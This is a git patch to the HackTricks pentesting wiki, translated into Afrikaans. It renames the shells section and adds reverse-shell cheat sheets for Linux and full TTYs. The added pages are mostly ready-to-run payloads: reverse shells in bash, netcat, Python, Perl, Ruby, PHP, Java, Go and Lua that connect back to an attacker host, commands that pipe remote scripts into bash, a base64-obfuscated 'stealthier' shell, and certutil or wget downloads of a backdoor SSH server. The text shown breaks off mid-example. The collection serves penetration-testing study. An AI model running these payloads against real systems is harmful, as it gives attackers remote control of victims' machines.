From 1acd9b4de000c51840d34b0bc1a4ec0e26d46d22 Mon Sep 17 00:00:00 2001 From: Translator Date: Sat, 31 Aug 2024 16:27:43 +0000 Subject: [PATCH] Translated ['generic-methodologies-and-resources/pentesting-methodology. --- SUMMARY.md | 10 +- .../pentesting-methodology.md | 46 +- .../reverse-shells/README.md | 36 ++ .../reverse-shells/full-ttys.md | 134 +++++ .../reverse-shells/linux.md | 362 +++++++++++++ .../reverse-shells/msfvenom.md | 242 +++++++++ .../reverse-shells/windows.md | 506 ++++++++++++++++++ .../pentesting-web/rocket-chat.md | 16 +- 8 files changed, 1315 insertions(+), 37 deletions(-) create mode 100644 generic-methodologies-and-resources/reverse-shells/README.md create mode 100644 generic-methodologies-and-resources/reverse-shells/full-ttys.md create mode 100644 generic-methodologies-and-resources/reverse-shells/linux.md create mode 100644 generic-methodologies-and-resources/reverse-shells/msfvenom.md create mode 100644 generic-methodologies-and-resources/reverse-shells/windows.md diff --git a/SUMMARY.md b/SUMMARY.md index 15aed9799..da21c1b58 100644 --- a/SUMMARY.md +++ b/SUMMARY.md 
@@ -74,11 +74,11 @@ * [Tunneling and Port Forwarding](generic-methodologies-and-resources/tunneling-and-port-forwarding.md) * [Threat Modeling](generic-methodologies-and-resources/threat-modeling.md) * [Search Exploits](generic-methodologies-and-resources/search-exploits.md) -* [Shells (Linux, Windows, MSFVenom)](generic-methodologies-and-resources/shells/README.md) - * [MSFVenom - CheatSheet](generic-methodologies-and-resources/shells/msfvenom.md) - * [Shells - Windows](generic-methodologies-and-resources/shells/windows.md) - * [Shells - Linux](generic-methodologies-and-resources/shells/linux.md) - * [Full TTYs](generic-methodologies-and-resources/shells/full-ttys.md) +* [Reverse Shells (Linux, Windows, MSFVenom)](generic-methodologies-and-resources/reverse-shells/README.md) + * [MSFVenom - CheatSheet](generic-methodologies-and-resources/reverse-shells/msfvenom.md) + * [Reverse Shells - Windows](generic-methodologies-and-resources/reverse-shells/windows.md) + * [Reverse Shells - Linux](generic-methodologies-and-resources/reverse-shells/linux.md) + * [Full TTYs](generic-methodologies-and-resources/reverse-shells/full-ttys.md) ## 🐧 Linux Hardening diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md index 374153239..175c94832 100644 --- a/generic-methodologies-and-resources/pentesting-methodology.md +++ b/generic-methodologies-and-resources/pentesting-methodology.md 
@@ -1,8 +1,8 @@ # Pentesting Metodologie {% hint style="success" %} -Leer & oefen AWS Hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Leer & oefen GCP Hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Leer & oefen AWS Hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -10,7 +10,7 @@ Leer & oefen GCP Hacking: {% endhint %} 
@@ -50,18 +50,18 @@ Die eerste ding om te doen wanneer jy **soek na kwesbaarhede in 'n host** is om ### **4-** [Soek diens weergawe exploits](search-exploits.md) -Sodra jy weet watter dienste loop, en dalk hul weergawe, moet jy **soek na bekende kwesbaarhede**. Miskien het jy geluk en daar is 'n exploit om vir jou 'n shell te gee... +Sodra jy weet watter dienste loop, en dalk hul weergawe, moet jy **soek na bekende kwesbaarhede**. Miskien het jy geluk en daar is 'n exploit om jou 'n shell te gee... ### **5-** Pentesting Dienste As daar nie enige fancy exploit vir enige lopende diens is nie, moet jy soek na **gewone misconfigurasies in elke diens wat loop.** -**Binne hierdie boek sal jy 'n gids vind om die mees algemene dienste te pentest** (en ander wat nie so algemeen is nie)**. Asseblief, soek in die linkerindeks die** _**PENTESTING**_ **afdeling** (die dienste is georden volgens hul standaard poorte). +**Binne hierdie boek sal jy 'n gids vind om die mees algemene dienste te pentest** (en ander wat nie so algemeen is nie)**. Soek asseblief in die linkerindeks die** _**PENTESTING**_ **afdeling** (die dienste is georden volgens hul standaard poorte). **Ek wil 'n spesiale vermelding maak van die** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **deel (aangesien dit die mees uitgebreide een is).**\ Ook, 'n klein gids oor hoe om [**bekende kwesbaarhede in sagteware te vind**](search-exploits.md) kan hier gevind word. -**As jou diens nie in die indeks is nie, soek in Google** vir ander tutoriaal en **laat my weet as jy wil hê ek moet dit byvoeg.** As jy **niks kan vind** in Google nie, voer jou **eie blinde pentesting** uit, jy kan begin deur **aan die diens te koppel, dit te fuzz en die antwoorde te lees** (indien enige). 
+**As jou diens nie in die indeks is nie, soek in Google** vir ander tutoriaal en **laat weet as jy wil hê ek moet dit byvoeg.** As jy **niks kan vind** in Google nie, voer jou **eie blinde pentesting** uit, jy kan begin deur **aan die diens te koppel, dit te fuzz en die antwoorde te lees** (indien enige). #### 5.1 Outomatiese Gereedskap @@ -73,11 +73,11 @@ In sommige scenario's kan 'n **Brute-Force** nuttig wees om 'n **diens** te **ko ### 6- [Phishing](phishing-methodology/) -As jy op hierdie punt nie enige interessante kwesbaarheid gevind het nie, mag jy **moet probeer om 'n paar phishing** om binne die netwerk te kom. Jy kan my phishing metodologie [hier](phishing-methodology/) lees: +As jy op hierdie punt nie enige interessante kwesbaarheid gevind het nie, **moet jy dalk probeer om 'n bietjie phishing** om binne die netwerk te kom. Jy kan my phishing metodologie [hier](phishing-methodology/) lees: -### **7-** [**Kry Shell**](shells/) +### **7-** [**Kry Shell**](reverse-shells/) -Op een of ander manier moet jy 'n **manier gevind het om kode** in die slagoffer uit te voer. Dan, [‘n lys van moontlike gereedskap binne die stelsel wat jy kan gebruik om 'n omgekeerde shell te kry, sal baie nuttig wees](shells/). +Op een of ander manier moet jy 'n **manier gevind het om kode** in die slagoffer uit te voer. Dan, [‘n lys van moontlike gereedskap binne die stelsel wat jy kan gebruik om 'n omgekeerde shell te kry, sal baie nuttig wees](reverse-shells/). Veral in Windows mag jy hulp nodig hê om **antivirusse te vermy**: [**Kyk na hierdie bladsy**](../windows-hardening/av-bypass.md)**.**\\ 
@@ -91,32 +91,32 @@ As jy probleme met die shell het, kan jy hier 'n klein **samestelling van die nu ### **9 -** [**Exfiltrasie**](exfiltration.md) -Jy sal waarskynlik **sommige data van die slagoffer moet onttrek** of selfs **iets** (soos privilige eskalasie skripte) moet **invoer**. **Hier het jy 'n** [**pos oor algemene gereedskap wat jy met hierdie doeleindes kan gebruik**](exfiltration.md)**.** +Jy sal waarskynlik moet **data uit die slagoffer onttrek** of selfs **iets inbring** (soos voorregverhoging skrifte). **Hier het jy 'n** [**pos oor algemene gereedskap wat jy met hierdie doeleindes kan gebruik**](exfiltration.md)**.** -### **10- Privilege Eskalasie** +### **10- Voorregverhoging** #### **10.1- Plaaslike Privesc** -As jy **nie root/Administrator** binne die boks is nie, moet jy 'n manier vind om **privileges te eskaleer.**\ -Hier kan jy 'n **gids vind om privileges plaaslik in** [**Linux**](../linux-hardening/privilege-escalation/) **en in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)** te eskaleer.**\ +As jy **nie root/Administrator** binne die boks is nie, moet jy 'n manier vind om **voorregte te verhoog.**\ +Hier kan jy 'n **gids vind om voorregte plaaslik in** [**Linux**](../linux-hardening/privilege-escalation/) **en in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)** te verhoog.**\ Jy moet ook hierdie bladsye oor hoe **Windows werk** nagaan: -* [**Outentisering, Akrediteer, Token privileges en UAC**](../windows-hardening/authentication-credentials-uac-and-efs/) +* [**Outentisering, Akrediteer, Token voorregte en UAC**](../windows-hardening/authentication-credentials-uac-and-efs/) * Hoe [**NTLM werk**](../windows-hardening/ntlm/) * Hoe om [**akrediteer te steel**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md) in Windows * Sommige truuks oor [_**Aktiewe Gids**_](../windows-hardening/active-directory-methodology/) -**Moet nie 
vergeet om die beste gereedskap te kyk om Windows en Linux plaaslike Privilege Eskalasie paaie te enumerate nie:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) +**Moet nie vergeet om die beste gereedskap te kyk om Windows en Linux plaaslike Voorregverhoging paaie te enumerate nie:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) #### **10.2- Domein Privesc** -Hier kan jy 'n [**metodologie vind wat die mees algemene aksies verduidelik om te enumerate, privileges te eskaleer en volharding op 'n Aktiewe Gids**](../windows-hardening/active-directory-methodology/). Alhoewel dit net 'n subafdeling van 'n afdeling is, kan hierdie proses **uiters delikaat** wees op 'n Pentesting/Red Team opdrag. +Hier kan jy 'n [**metodologie vind wat die mees algemene aksies verduidelik om te enumerate, voorregte te verhoog en volharding op 'n Aktiewe Gids**](../windows-hardening/active-directory-methodology/). Alhoewel dit net 'n subafdeling van 'n afdeling is, kan hierdie proses **uiters delikaat** wees op 'n Pentesting/Red Team opdrag. ### 11 - POST #### **11**.1 - Plundering -Kyk of jy meer **wagwoorde** binne die host kan vind of as jy **toegang het tot ander masjiene** met die **privileges** van jou **gebruiker**.\ +Kyk of jy meer **wagwoorde** binne die host kan vind of as jy **toegang het tot ander masjiene** met die **voorregte** van jou **gebruiker**.\ Vind hier verskillende maniere om [**wagwoorde in Windows te dump**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md). #### 11.2 - Volharding 
@@ -129,8 +129,8 @@ TODO: Voltooi volharding Post in Windows & Linux ### 12 - Pivoting Met die **versamelde akrediteer** kan jy toegang tot ander masjiene hê, of dalk moet jy **nuwe hosts ontdek en skandeer** (begin die Pentesting Metodologie weer) binne nuwe netwerke waar jou slagoffer gekoppel is.\ -In hierdie geval kan tunneling nodig wees. Hier kan jy [**'n pos oor tunneling**](tunneling-and-port-forwarding.md) vind.\ -Jy moet beslis ook die pos oor [Aktiewe Gids pentesting Metodologie](../windows-hardening/active-directory-methodology/) nagaan. Daar sal jy koel truuks vind om lateraal te beweeg, privileges te eskaleer en akrediteer te dump.\ +In hierdie geval kan tonnelering nodig wees. Hier kan jy [**'n pos oor tonnelering vind**](tunneling-and-port-forwarding.md).\ +Jy moet beslis ook die pos oor [Aktiewe Gids pentesting Metodologie](../windows-hardening/active-directory-methodology/) nagaan. Daar sal jy oulike truuks vind om lateraal te beweeg, voorregte te verhoog en akrediteer te dump.\ Kyk ook na die bladsy oor [**NTLM**](../windows-hardening/ntlm/), dit kan baie nuttig wees om op Windows omgewings te pivot. ### MEER @@ -139,7 +139,7 @@ Kyk ook na die bladsy oor [**NTLM**](../windows-hardening/ntlm/), dit kan baie n #### **Exploitering** -* [**Basiese Linux Exploitering**](broken-reference) +* [**Basiese Linux Exploitering**](broken-reference/) * [**Basiese Windows Exploitering**](../binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md) * [**Basiese exploitering gereedskap**](../binary-exploitation/basic-stack-binary-exploitation-methodology/tools/) 
@@ -158,8 +158,8 @@ As jy belangstel in 'n **hacking loopbaan** en die onhackbare hack - **ons huur {% embed url="https://www.stmcyber.com/careers" %} {% hint style="success" %} -Leer & oefen AWS Hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Leer & oefen GCP Hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Leer & oefen AWS Hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -167,7 +167,7 @@ Leer & oefen GCP Hacking: {% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/README.md b/generic-methodologies-and-resources/reverse-shells/README.md new file mode 100644 index 000000000..8a14345c6 --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/README.md @@ -0,0 +1,36 @@ +{% hint style="success" %} +Leer & oefen AWS Hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Ondersteun HackTricks + +* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + + +# [**Shells - Linux**](linux.md) + +# [**Shells - Windows**](windows.md) + +# [**MSFVenom - CheatSheet**](msfvenom.md) + +# [**Full TTYs**](full-ttys.md) + +# **Outomaties gegenereerde shells** + +* [**https://reverse-shell.sh/**](https://reverse-shell.sh/) +* [**https://www.revshells.com/**](https://www.revshells.com/) +* [**https://github.com/ShutdownRepo/shellerator**](https://github.com/ShutdownRepo/shellerator) +* [**https://github.com/0x00-0x00/ShellPop**](https://github.com/0x00-0x00/ShellPop) +* [**https://github.com/cybervaca/ShellReverse**](https://github.com/cybervaca/ShellReverse) +* [**https://liftoff.github.io/pyminifier/**](https://liftoff.github.io/pyminifier/) +* [**https://github.com/xct/xc/**](https://github.com/xct/xc/) +* [**https://weibell.github.io/reverse-shell-generator/**](https://weibell.github.io/reverse-shell-generator/) +* [**https://github.com/t0thkr1s/revshellgen**](https://github.com/t0thkr1s/revshellgen) +* [**https://github.com/mthbernardes/rsg**](https://github.com/mthbernardes/rsg) diff --git a/generic-methodologies-and-resources/reverse-shells/full-ttys.md b/generic-methodologies-and-resources/reverse-shells/full-ttys.md new file mode 100644 index 000000000..6c8aa1d1a --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/full-ttys.md @@ -0,0 +1,134 @@ +# Volle TTYs + +{% hint style="success" %} +Leer & oefen AWS Hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Ondersteun HackTricks + +* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Volle TTY + +Let daarop dat die shell wat jy in die `SHELL` veranderlike stel **moet** wees **gelys binne** _**/etc/shells**_ of `Die waarde vir die SHELL veranderlike is nie in die /etc/shells lêer gevind nie. Hierdie voorval is gerapporteer`. Let ook daarop dat die volgende snippette slegs in bash werk. As jy in 'n zsh is, verander na 'n bash voordat jy die shell verkry deur `bash` te loop. + +#### Python + +{% code overflow="wrap" %} +```bash +python3 -c 'import pty; pty.spawn("/bin/bash")' + +(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; +``` +{% endcode %} + +{% hint style="info" %} +Jy kan die **aantal** **rye** en **kolomme** kry deur **`stty -a`** uit te voer +{% endhint %} + +#### script + +{% code overflow="wrap" %} +```bash +script /dev/null -qc /bin/bash #/dev/null is to not store anything +(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; +``` +{% endcode %} + +#### socat +```bash +#Listener: +socat file:`tty`,raw,echo=0 tcp-listen:4444 + +#Victim: +socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 +``` +### **Spawn shells** + +* `python -c 'import pty; pty.spawn("/bin/sh")'` +* `echo os.system('/bin/bash')` +* `/bin/sh -i` +* `script -qc /bin/bash /dev/null` +* `perl -e 'exec "/bin/sh";'` +* perl: `exec "/bin/sh";` +* ruby: `exec "/bin/sh"` +* lua: `os.execute('/bin/sh')` +* IRB: `exec "/bin/sh"` +* vi: `:!bash` +* vi: `:set shell=/bin/bash:shell` +* nmap: `!sh` + +## ReverseSSH + +'n gerieflike manier vir **interaktiewe skulp toegang**, sowel as **lêer oordragte** en **poort forwarding**, is om die staties-gekoppelde ssh bediener [ReverseSSH](https://github.com/Fahrj/reverse-ssh) op die teiken te plaas. + +Hieronder is 'n voorbeeld vir `x86` met upx-gecomprimeerde binêre. 
Vir ander binêre, kyk na die [releases page](https://github.com/Fahrj/reverse-ssh/releases/latest/). + +1. Berei plaaslik voor om die ssh poort forwarding versoek te vang: + +{% code overflow="wrap" %} +```bash +# Drop it via your preferred way, e.g. +wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh + +/dev/shm/reverse-ssh -v -l -p 4444 +``` +{% endcode %} + +* (2a) Linux teiken: + +{% code overflow="wrap" %} +```bash +# Drop it via your preferred way, e.g. +wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh + +/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2 +``` +{% endcode %} + +* (2b) Windows 10 teiken (vir vroeëre weergawes, kyk na [projek leesmy] (https://github.com/Fahrj/reverse-ssh#features)): + +{% code overflow="wrap" %} +```bash +# Drop it via your preferred way, e.g. +certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe + +reverse-ssh.exe -p 4444 kali@10.0.0.2 +``` +{% endcode %} + +* As die ReverseSSH poort forwarding versoek suksesvol was, behoort jy nou in staat te wees om in te log met die standaard wagwoord `letmeinbrudipls` in die konteks van die gebruiker wat `reverse-ssh(.exe)` uitvoer: +```bash +# Interactive shell access +ssh -p 8888 127.0.0.1 + +# Bidirectional file transfer +sftp -P 8888 127.0.0.1 +``` +## Geen TTY + +As jy om een of ander rede nie 'n volle TTY kan verkry nie, kan jy **nog steeds met programme interaksie hê** wat gebruikersinvoer verwag. 
In die volgende voorbeeld word die wagwoord aan `sudo` gegee om 'n lêer te lees: +```bash +expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "";send "\r\n";interact' +``` +{% hint style="success" %} +Leer & oefen AWS Hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Ondersteun HackTricks + +* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/linux.md b/generic-methodologies-and-resources/reverse-shells/linux.md new file mode 100644 index 000000000..4efd5762d --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/linux.md @@ -0,0 +1,362 @@ +# Shells - Linux + +{% hint style="success" %} +Leer & oefen AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Ondersteun HackTricks + +* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)! +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +**Probeer Hard Sekuriteitsgroep** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +*** + +**As jy vrae het oor enige van hierdie shells kan jy dit nagaan met** [**https://explainshell.com/**](https://explainshell.com) + +## Volle TTY + +**Sodra jy 'n omgekeerde shell kry**[ **lees hierdie bladsy om 'n volle TTY te verkry**](full-ttys.md)**.** + +## Bash | sh +```bash +curl https://reverse-shell.sh/1.1.1.1:3000 | bash +bash -i >& /dev/tcp// 0>&1 +bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP +0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196 +exec 5<>/dev/tcp//; while read line 0<&5; do $line 2>&5 >&5; done + +#Short and bypass (credits to Dikline) +(sh)0>/dev/tcp/10.10.10.10/9091 +#after getting the previous shell to get the output to execute +exec >&0 +``` +Moet nie vergeet om met ander shells te kyk nie: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, en bash. + +### Simbool veilige shell +```bash +#If you need a more stable connection do: +bash -c 'bash -i >& /dev/tcp// 0>&1' + +#Stealthier method +#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0 +echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null +``` +#### Shell verduideliking + +1. **`bash -i`**: Hierdie deel van die opdrag begin 'n interaktiewe (`-i`) Bash-skal. +2. **`>&`**: Hierdie deel van die opdrag is 'n afgekorte notasie vir **om beide standaarduitset** (`stdout`) en **standaardfout** (`stderr`) na die **dieselfde bestemming** te herlei. +3. **`/dev/tcp//`**: Dit is 'n spesiale lêer wat **'n TCP-verbinding na die gespesifiseerde IP-adres en poort** verteenwoordig. +* Deur **die uitset en foutstrome na hierdie lêer te herlei**, stuur die opdrag effektief die uitset van die interaktiewe skalsessie na die aanvaller se masjien. +4. **`0>&1`**: Hierdie deel van die opdrag **herlei standaardinvoer (`stdin`) na die dieselfde bestemming as standaarduitset (`stdout`)**. 
+ +### Skep in lêer en voer uit +```bash +echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1/ 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh; +wget http:///shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh +``` +## Forward Shell + +Wanneer jy met 'n **Remote Code Execution (RCE)** kwesbaarheid binne 'n Linux-gebaseerde webtoepassing werk, kan die verkryging van 'n reverse shell belemmer word deur netwerkverdedigings soos iptables-reëls of ingewikkelde pakketfiltering meganismes. In sulke beperkte omgewings behels 'n alternatiewe benadering die vestiging van 'n PTY (Pseudo Terminal) shell om meer effektief met die gecompromitteerde stelsel te kommunikeer. + +'n Aanbevole hulpmiddel vir hierdie doel is [toboggan](https://github.com/n3rada/toboggan.git), wat interaksie met die teikenomgewing vereenvoudig. + +Om toboggan effektief te gebruik, skep 'n Python-module wat op die RCE-konteks van jou teikenstelsel aangepas is. Byvoorbeeld, 'n module genaamd `nix.py` kan as volg gestruktureer word: +```python3 +import jwt +import httpx + +def execute(command: str, timeout: float = None) -> str: +# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution +token = jwt.encode( +{"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256" +) + +response = httpx.get( +url="https://vulnerable.io:3200", +headers={"Authorization": f"Bearer {token}"}, +timeout=timeout, +# ||BURP|| +verify=False, +) + +# Check if the request was successful +response.raise_for_status() + +return response.text +``` +En dan kan jy uitvoer: +```shell +toboggan -m nix.py -i +``` +Om 'n interaktiewe skulp direk te benut. Jy kan `-b` byvoeg vir Burpsuite integrasie en die `-i` verwyder vir 'n meer basiese rce-wrapper. + +'n Ander moontlikheid bestaan uit die gebruik van die `IppSec` voorwaartse skulpimplementering [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell). 
+ +Jy moet net die volgende aanpas: + +* Die URL van die kwesbare gasheer +* Die voorvoegsel en agtervoegsel van jou payload (indien enige) +* Die manier waarop die payload gestuur word (koppe? data? ekstra inligting?) + +Dan kan jy net **opdragte stuur** of selfs **die `upgrade` opdrag gebruik** om 'n volle PTY te verkry (let daarop dat pype met 'n ongeveer 1.3s vertraging gelees en geskryf word). + +## Netcat +```bash +nc -e /bin/sh +nc | /bin/sh #Blind +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f +nc | /bin/bash | nc +rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0 1>/tmp/bkpipe +``` +## gsocket + +Kyk dit in [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/) +```bash +bash -c "$(curl -fsSL gsocket.io/x)" +``` +## Telnet +```bash +telnet | /bin/sh #Blind +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet >/tmp/f +telnet | /bin/bash | telnet +rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0 1>/tmp/bkpipe +``` +## Whois + +**Aanvaller** +```bash +while true; do nc -l ; done +``` +Om die opdrag te stuur, skryf dit neer, druk enter en druk CTRL+D (om STDIN te stop) + +**Slachtoffer** +```bash +export X=Connected; while true; do X=`eval $(whois -h -p "Output: $X")`; sleep 1; done +``` +## Python +```bash +#Linux +export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' +#IPv6 +python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' +``` +## Perl +```bash +perl -e 'use 
Socket;$i="";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' +perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' +``` +## Ruby +```bash +ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' +ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' +``` +## PHP +```php +// Using 'exec' is the most common method, but assumes that the file descriptor will be 3. +// Using this method may lead to instances where the connection reaches out to the listener and then closes. +php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' + +// Using 'proc_open' makes no assumptions about what the file descriptor will be. +// See https://security.stackexchange.com/a/198944 for more information +$sock, 1=>$sock, 2=>$sock), $pipes); ?> + +/dev/tcp/10.10.14.8/4444 0>&1'"); ?> +``` +## Java +```bash +r = Runtime.getRuntime() +p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) +p.waitFor() +``` +## Ncat +```bash +victim> ncat --ssl -c "bash -i 2>&1" +attacker> ncat -l --ssl +``` +## Golang +```bash +echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go +``` +## Lua +```bash +#Linux +lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" +#Windows & Linux +lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); 
